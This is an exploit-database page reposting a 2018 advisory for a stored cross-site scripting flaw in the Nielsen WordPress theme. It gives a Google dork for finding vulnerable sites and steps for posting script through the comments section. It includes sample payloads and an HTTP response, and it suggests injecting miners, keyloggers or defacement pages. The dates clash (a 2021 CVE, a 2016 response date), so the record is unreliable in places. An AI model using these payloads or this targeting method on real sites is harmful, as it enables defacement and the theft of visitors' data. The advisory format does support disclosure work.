Advertisement






Nielsen Wordpress Theme Xss Stored Exploit

CVE Category Price Severity
CVE-2021-34620 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-14
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040113

Below is a copy:

Nielsen Wordpress Theme Xss Stored Exploit
##################################################
# Title : Nielsen Wordpress Theme Xss Stored Exploit
# Date : 14 April 2018
# Author : GIST
# Version : 1.4.1
# Google Dork : inurl:/wp-content/themes/nielsen
# Youtube : 
# Tested on : Ubuntu
# Vendor : https://themeforest.net/item/nielsen-ecommerce-wordpress-theme/9710159
##################################################

Description : 

Nielsen is a truly user-oriented e-commerce theme,
with a multiconcept layout and a lot of advanced features to enhance your shop.
There are more than 4.000 website that installed this theme.
You Can Put Your Javascripts Code and Run it on website
or you can Inject Your scripts (Miner or Keylogger)

Xss : 

 First Open Enter Google Dork And open Your target.
  
 then open an post and go to Comments section
 
 Then Put your script and post it.
 
 Request Method : Post
 
 -- response --

HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip

commands : <script>alert('Xss')</script>    or    "><script>alert('Xss')</script>   or Enter Your Deface Page Source

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum